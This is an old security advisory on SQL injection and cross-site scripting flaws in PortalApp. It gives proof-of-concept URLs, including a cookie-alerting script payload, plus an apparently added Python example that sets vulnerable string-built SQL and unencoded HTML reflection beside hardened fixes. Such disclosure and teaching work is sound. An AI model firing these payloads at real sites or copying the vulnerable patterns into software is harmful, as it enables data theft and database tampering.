Multiple SQL injection and cross site scripting vulnerabilities have been discovered in PortalApp. Sample exploitation provided.
ef8774a270f7cf5c3c385dd44115e3f3ab80760745b1a26d5d9c111db428ebee
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
Severity: Medium
Title: Multiple sql injection, and xss vulnerabilities in PortalApp.
Date: March 30, 2005
Vendor: AspApp
Vendor site: http://www.aspapp.com
Summary:
There are multiple sql injection, xss vulnerabilities in the PortalApp.
Proof of Concept Exploits:
http://localhost/ad_click.asp?banner_id='SQL_INJECTION
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'banner_id = 'SQL_INJECTION'.
/ad_click.asp, line 14
http://localhost/content.asp?contenttype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/content.asp?do_search=1&keywords='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
Possible fix: Using htmlspecialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the MySQL database, or before echoing data to the screen, would solve these problems.
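The two defect classes in this advisory, a quoted parameter spliced into SQL text (ad_click.asp, banner_id) and a request parameter reflected into HTML unencoded (content.asp, contenttype and keywords), shown beside their hardened forms. This is an added example and not PortalApp's code: it is written in Python with sqlite3 instead of classic ASP and JET so that it runs stand-alone, the parameter names come from the advisory, and the banners table and the request dispatcher are constructed for the example.

```python
"""Added example (not PortalApp's code): string-built SQL and unencoded HTML
reflection next to a parameterized query and output encoding, in Python/sqlite3
as a stand-in for ASP/JET. Table layout and request handling are constructed."""
import html
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed payloads: the decoded strings from the advisory's proof-of-concept URLs.
SQLI_PAYLOAD = "'SQL_INJECTION"
XSS_PAYLOAD = '"><script>alert(document.cookie)</script>'


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the database behind ad_click.asp (constructed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE banners (banner_id INTEGER PRIMARY KEY, url TEXT)")
    conn.execute("INSERT INTO banners VALUES (3, 'http://example.invalid/ad')")
    return conn


def ad_click_vulnerable(conn, banner_id: str):
    """String concatenation: a quote inside banner_id becomes part of the SQL text.
    With the advisory's payload the statement no longer parses, which is the
    sqlite3 counterpart of the JET '80040e14' syntax error quoted above."""
    sql = f"SELECT url FROM banners WHERE banner_id = '{banner_id}'"
    return conn.execute(sql).fetchone()


def ad_click_fixed(conn, banner_id: str):
    """Parameterized query plus type enforcement: the value never enters the SQL
    text, and a non-numeric id is rejected before the database sees it."""
    if not banner_id.isdigit():
        return None
    return conn.execute(
        "SELECT url FROM banners WHERE banner_id = ?", (int(banner_id),)
    ).fetchone()


def query_error(conn, handler, banner_id: str):
    """Return the database error message a handler raises for banner_id, or None."""
    try:
        handler(conn, banner_id)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def reflect_vulnerable(name: str, value: str) -> str:
    """Echo a request parameter verbatim into an attribute value, as content.asp
    does according to the advisory: a double quote closes the attribute."""
    return f'<input name="{name}" value="{value}">'


def reflect_fixed(name: str, value: str) -> str:
    """Encode at the HTML sink. html.escape with quote=True also encodes both
    quote characters, so neither PoC variant can leave the attribute value."""
    return f'<input name="{name}" value="{html.escape(value, quote=True)}">'


def handle(url: str, conn) -> dict:
    """Constructed dispatcher routing the advisory's URLs to the hardened handlers."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)

    def first(key: str) -> str:
        return qs.get(key, [""])[0]

    if parts.path == "/ad_click.asp":
        row = ad_click_fixed(conn, first("banner_id"))
        if row is None:
            return {"status": 404, "body": "unknown banner"}
        return {"status": 302, "body": row[0]}
    if parts.path == "/content.asp":
        body = reflect_fixed("contenttype", first("contenttype"))
        body += reflect_fixed("keywords", first("keywords"))
        return {"status": 200, "body": body}
    return {"status": 404, "body": ""}


if __name__ == "__main__":
    db = make_db()
    print(query_error(db, ad_click_vulnerable, SQLI_PAYLOAD))   # a syntax error
    print(query_error(db, ad_click_fixed, SQLI_PAYLOAD))        # None
    print(reflect_vulnerable("contenttype", XSS_PAYLOAD))       # live <script>
    print(reflect_fixed("contenttype", XSS_PAYLOAD))            # encoded text
```

The parameterized handler fails closed on the payload (no row, no error text reaching the client), which also removes the verbose database error that made the injection point easy to confirm; the encoded reflection keeps the payload as inert text rather than markup. In the original ASP and JET setting the equivalents are ADODB.Command parameters and Server.HTMLEncode.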
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Look out for my soon to come out book on secure coding with PHP.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQkjxjyZV5e8av/DUEQJTagCeMdB58bY72TMo6mITsSHLByjCT/MAnjRM
n0K6nk2uxIlFknfglJIoUkqq
=V5fo
-----END PGP SIGNATURE-----